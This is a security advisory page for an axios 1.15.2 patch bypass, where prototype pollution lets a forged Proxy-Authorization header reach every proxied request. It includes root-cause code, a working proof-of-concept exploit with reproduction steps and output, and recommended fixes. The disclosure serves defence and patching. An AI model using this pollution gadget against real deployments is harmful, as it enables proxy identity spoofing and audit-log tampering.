Skip to main content

Axios EUVDEUVD-2026-36256

| CVE-2026-44489 MEDIUM
HTTP Response Splitting (CWE-113)
2026-05-29 https://github.com/axios/axios GHSA-654m-c8p4-x5fp
5.3
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Red Hat
3.7 LOW
qualitative

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Lifecycle Timeline

5
Severity Changed
Jun 15, 2026 - 16:22 NVD
LOW MEDIUM
CVSS changed
Jun 15, 2026 - 16:22 NVD
3.7 (LOW) 5.3 (MEDIUM)
Source Code Evidence Fetched
May 29, 2026 - 16:22 vuln.today
Analysis Generated
May 29, 2026 - 16:22 vuln.today
CVE Published
May 29, 2026 - 15:51 nvd
LOW 3.7

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 1,059 npm packages depend on axios (565 direct, 498 indirect)

Ecosystem-wide dependent count for version 1.15.2.

DescriptionNVD

[Patch Bypass] Proxy-Authorization Header Injection via Prototype Pollution - Incomplete Null-Prototype Fix in Axios 1.15.2

Summary

The Object.create(null) fix introduced in Axios 1.15.2 (GHSA-q8qp-cvcw-x6jj) protects the top-level config object from prototype pollution. However, nested objects created by utils.merge() (e.g., config.proxy) are still constructed as plain {} with Object.prototype in their chain.

The setProxy() function at lib/adapters/http.js:209-223 reads proxy.username, proxy.password, and proxy.auth without hasOwnProperty checks. When Object.prototype.username is polluted, setProxy() constructs a Proxy-Authorization header with attacker-controlled credentials and injects it into every proxied HTTP request.

Severity: Medium (CVSS 5.4) Affected Versions: 1.15.2 (and potentially 1.15.1) Vulnerable Component: lib/adapters/http.js (setProxy()) + lib/utils.js (merge())

CWE

  • CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
  • CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

CVSS 3.1

Score: 5.6 (Medium)

Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

MetricValueJustification
Attack VectorNetworkPP triggered remotely via vulnerable dependency
Attack ComplexityHighRequires two preconditions: (1) PP in dependency tree, AND (2) the application must explicitly configure config.proxy. Unlike GHSA-q8qp-cvcw-x6jj which affected all requests unconditionally
Privileges RequiredNoneNo authentication needed
User InteractionNoneNo user interaction required
ScopeUnchangedWithin the proxy authentication context
ConfidentialityLowAttacker-controlled identity appears in proxy authentication logs, but the attacker does NOT see request/response data (unlike config.baseURL hijack)
IntegrityLowProxy-Authorization header injected; proxy may apply different access policies based on injected identity
AvailabilityLowIf proxy rejects the injected credentials, legitimate requests may fail

Why This Is Lower Severity Than GHSA-q8qp-cvcw-x6jj (7.4 High)

FactorGHSA-q8qp-cvcw-x6jjThis Finding
PreconditionNone - all requests affectedMust have config.proxy set
config.baseURL PPHijacks all relative URL requestsNot applicable
config.auth PPInjects Authorization to target serverOnly injects Proxy-Authorization to proxy
Attacker sees trafficYes (via baseURL redirect)No - only proxy identity affected
Impact scopeUniversal - every axios requestOnly requests with explicit proxy config

This Is a Patch Bypass

This vulnerability bypasses the fix introduced in Axios 1.15.2 for GHSA-q8qp-cvcw-x6jj. The fix correctly uses Object.create(null) for the config object, blocking direct prototype pollution on config.proxy, config.auth, etc.

However, the fix is incomplete: when a user legitimately sets config.proxy = { host: 'proxy.corp', port: 8080 }, the mergeConfig() function passes this object through utils.merge(), which creates a new plain {} object (lib/utils.js:406: const result = {};). This new object inherits from Object.prototype, re-opening the prototype pollution attack surface on the nested proxy object.

LayerProtectionStatus
config (top-level)Object.create(null)✓ Fixed
config.proxy (nested)utils.merge()const result = {}✗ NOT Fixed
setProxy() readsproxy.username, proxy.auth without hasOwnProperty✗ NOT Fixed

Root Cause Analysis

Step 1: utils.merge() creates plain {} for nested objects

File: lib/utils.js, line 406

javascript
function merge(/* obj1, obj2, obj3, ... */) {
  const result = {};  // ← Plain object with Object.prototype!
  // ...
}

When mergeConfig() processes config.proxy, getMergedValue() calls utils.merge(), which creates a plain {} for the nested object. This plain object inherits from Object.prototype.

Step 2: setProxy() reads proxy properties without hasOwnProperty

File: lib/adapters/http.js, lines 209-223

javascript
function setProxy(options, configProxy, location) {
  let proxy = configProxy;
  // ...
  if (proxy) {
    if (proxy.username) {                    // ← traverses Object.prototype!
      proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');
    }

    if (proxy.auth) {                        // ← traverses Object.prototype!
      const validProxyAuth = Boolean(proxy.auth.username || proxy.auth.password);
      if (validProxyAuth) {
        proxy.auth = (proxy.auth.username || '') + ':' + (proxy.auth.password || '');
      }
      // ...
      const base64 = Buffer.from(proxy.auth, 'utf8').toString('base64');
      options.headers['Proxy-Authorization'] = 'Basic ' + base64;  // ← INJECTED!
    }
    // ...
  }
}

Complete Attack Chain

Object.prototype.username = 'attacker'
Object.prototype.password = 'stolen-creds'
         │
         ▼
  User config: { proxy: { host: 'proxy.corp', port: 8080 } }
         │
         ▼
  mergeConfig() → utils.merge() → new plain {}
  config.proxy = { host: 'proxy.corp', port: 8080 }  (own properties)
  config.proxy inherits from Object.prototype         (has .username, .password)
         │
         ▼
  setProxy() at http.js:209:
    proxy.username → 'attacker' (from Object.prototype) → truthy!
    proxy.auth = 'attacker' + ':' + 'stolen-creds'
         │
         ▼
  http.js:223: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
  Injected into EVERY proxied HTTP request!

Proof of Concept

javascript
import http from 'http';
import axios from './index.js';

// Proxy server logs received Proxy-Authorization
const proxyServer = http.createServer((req, res) => {
  console.log('Proxy-Authorization:', req.headers['proxy-authorization']);
  res.writeHead(200);
  res.end('OK');
});
await new Promise(r => proxyServer.listen(0, r));
const proxyPort = proxyServer.address().port;

// Target server
const target = http.createServer((req, res) => { res.writeHead(200); res.end(); });
await new Promise(r => target.listen(0, r));

// Simulate prototype pollution from vulnerable dependency
Object.prototype.username = 'attacker';
Object.prototype.password = 'stolen-creds';

// Developer sets proxy WITHOUT auth - expects no auth header
await axios.get(`http://127.0.0.1:${target.address().port}/api`, {
  proxy: { host: '127.0.0.1', port: proxyPort, protocol: 'http' },
});

// Proxy receives: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
// Decoded: attacker:stolen-creds

delete Object.prototype.username;
delete Object.prototype.password;
proxyServer.close();
target.close();

Reproduction Environment

Axios version: 1.15.2 (latest patched release)
Node.js version: v20.20.2
OS: macOS Darwin 25.4.0

Reproduction Steps

bash
# 1. Install axios 1.15.2
npm pack axios@1.15.2
tar xzf axios-1.15.2.tgz && mv package axios-1.15.2
cd axios-1.15.2 && npm install
# 2. Save PoC as poc.mjs (code from Section 7 above)
# 3. Run
node poc.mjs

Verified PoC Output

=== Axios 1.15.2: PP → Proxy-Authorization Injection ===

[1] Normal request with proxy (no auth):
  Proxy-Authorization: none

[2] Prototype Pollution: Object.prototype.username = "attacker"
  Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
  Decoded: attacker:stolen-creds
  → PP injected proxy credentials: attacker:stolen-creds

[3] Impact:
  ✗ Attacker injects Proxy-Authorization into all proxied requests
  ✗ If proxy logs auth, attacker credential appears in proxy logs
  ✗ If proxy authenticates based on this, attacker controls proxy identity
  ✗ Works on 1.15.2 despite null-prototype config fix
  ✗ Root cause: proxy object is plain {} from utils.merge, NOT null-prototype

Confirming the Bypass Mechanism

Direct PP (config.proxy) - BLOCKED by 1.15.2:
  Object.prototype.proxy = { host: 'evil' }
  config.proxy = undefined            ← null-prototype blocks ✓

Nested PP (proxy.username) - BYPASSES 1.15.2:
  Object.prototype.username = 'attacker'
  config.proxy = { host: 'legit', port: 8080 }  ← user-set, own properties
  config.proxy own keys: ['host', 'port']        ← username NOT own
  config.proxy.username = 'attacker'             ← inherited from Object.prototype!
  hasOwn(config.proxy, 'username') = false
## Impact Analysis

- **Proxy Identity Spoofing:** The injected `Proxy-Authorization` header authenticates all requests to the proxy as the attacker. If the proxy enforces authentication-based access control or logging, the attacker controls the identity.
- **Proxy Log Poisoning:** Proxy servers that log authenticated usernames will record "attacker" instead of the real user, enabling audit trail manipulation.
- **Credential Injection Amplification:** If the proxy forwards the `Proxy-Authorization` header upstream (some transparent proxies do), the attacker's credentials propagate through the proxy chain.
- **Universal Scope When Proxy Is Configured:** Affects every axios request that uses a proxy configuration without explicit auth - a common pattern in corporate environments.
### Prerequisite

- Application must use `config.proxy` (explicit proxy configuration)
- A separate prototype pollution vulnerability must exist in the dependency tree
- `Object.prototype.username` or `Object.prototype.auth` must be polluted
## Recommended Fix
### Fix 1: Use `hasOwnProperty` in `setProxy()`

function setProxy(options, configProxy, location) { let proxy = configProxy; // ... if (proxy) { const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

if (hasOwn(proxy, 'username')) { proxy.auth = (proxy.username || '') + ':' + (proxy.password || ''); }

if (hasOwn(proxy, 'auth')) { // ... existing auth handling ... } } }

### Fix 2: Use null-prototype objects in `utils.merge()`

// lib/utils.js line 406 function merge(/* obj1, obj2, obj3, ... */) { const result = Object.create(null); // ← null-prototype for nested objects too // ... }

### Fix 3 (Comprehensive): Apply null-prototype to all objects created by `getMergedValue()`
## References

- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)
- [GHSA-q8qp-cvcw-x6jj: Original PP Gadgets Fix (Axios 1.15.2)](https://github.com/advisories/GHSA-q8qp-cvcw-x6jj)
- [GHSA-fvcv-3m26-pcqx: Related PP Gadget (Axios 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)
- [Axios GitHub Repository](https://github.com/axios/axios)

AnalysisAI

{} instances that inherit from Object.prototype - and setProxy() in lib/adapters/http.js reads proxy.username and proxy.auth without hasOwnProperty guards, allowing prototype-polluted values to forge a Proxy-Authorization header injected into every proxied request. A working proof of concept has been publicly disclosed by the reporter; no active exploitation has been confirmed (not in CISA KEV).

Technical ContextAI

Axios (pkg:npm/axios) is a widely deployed JavaScript HTTP client for Node.js and browsers. This vulnerability resides in the Node.js HTTP adapter at lib/adapters/http.js and the utility merge function at lib/utils.js. The root cause is CWE-1321 (Prototype Pollution): the utils.merge() function initializes its accumulator as const result = {} (line 406), producing a plain object that inherits from Object.prototype. When mergeConfig() processes a user-supplied config.proxy object, getMergedValue() routes it through utils.merge(), yielding a new nested object that carries any polluted prototype properties. The secondary root cause is CWE-113 (HTTP Header Injection): setProxy() then reads proxy.username and proxy.auth via ordinary property access without Object.prototype.hasOwnProperty.call() guards. If Object.prototype.username has been polluted by a separate gadget elsewhere in the dependency tree, setProxy() treats the polluted value as a legitimate credential and constructs a Base64-encoded Proxy-Authorization: Basic header, injecting it into every outbound proxied request. The prior fix for GHSA-q8qp-cvcw-x6jj protected only the top-level config object with Object.create(null), leaving this nested attack surface intact.

RemediationAI

Upgrade Axios to version 1.16.0, which is the vendor-confirmed fixed release per the GHSA-654m-c8p4-x5fp advisory at https://github.com/axios/axios/security/advisories/GHSA-654m-c8p4-x5fp. If an immediate upgrade is not possible, two code-level workarounds are available with trade-offs: (1) Patch setProxy() in lib/adapters/http.js to replace bare property access with Object.prototype.hasOwnProperty.call(proxy, 'username') and Object.prototype.hasOwnProperty.call(proxy, 'auth') - this is surgical but requires patching a transitive dependency, which may be overwritten on npm install; (2) Change the accumulator in utils.merge() from const result = {} to const result = Object.create(null) - this is more comprehensive but could affect other merge call sites if downstream code assumes Object.prototype methods are available. At the application layer, if no upstream prototype pollution source exists, the attack chain cannot be completed - auditing the dependency tree for CWE-1321 gadgets (e.g., via npm audit or manual review of JSON parsers and config loaders) is a meaningful compensating control. Disabling proxy configuration entirely (removing config.proxy) eliminates this specific gadget but may not be operationally feasible in proxied enterprise environments.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Vendor StatusVendor

Share

EUVD-2026-36256 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy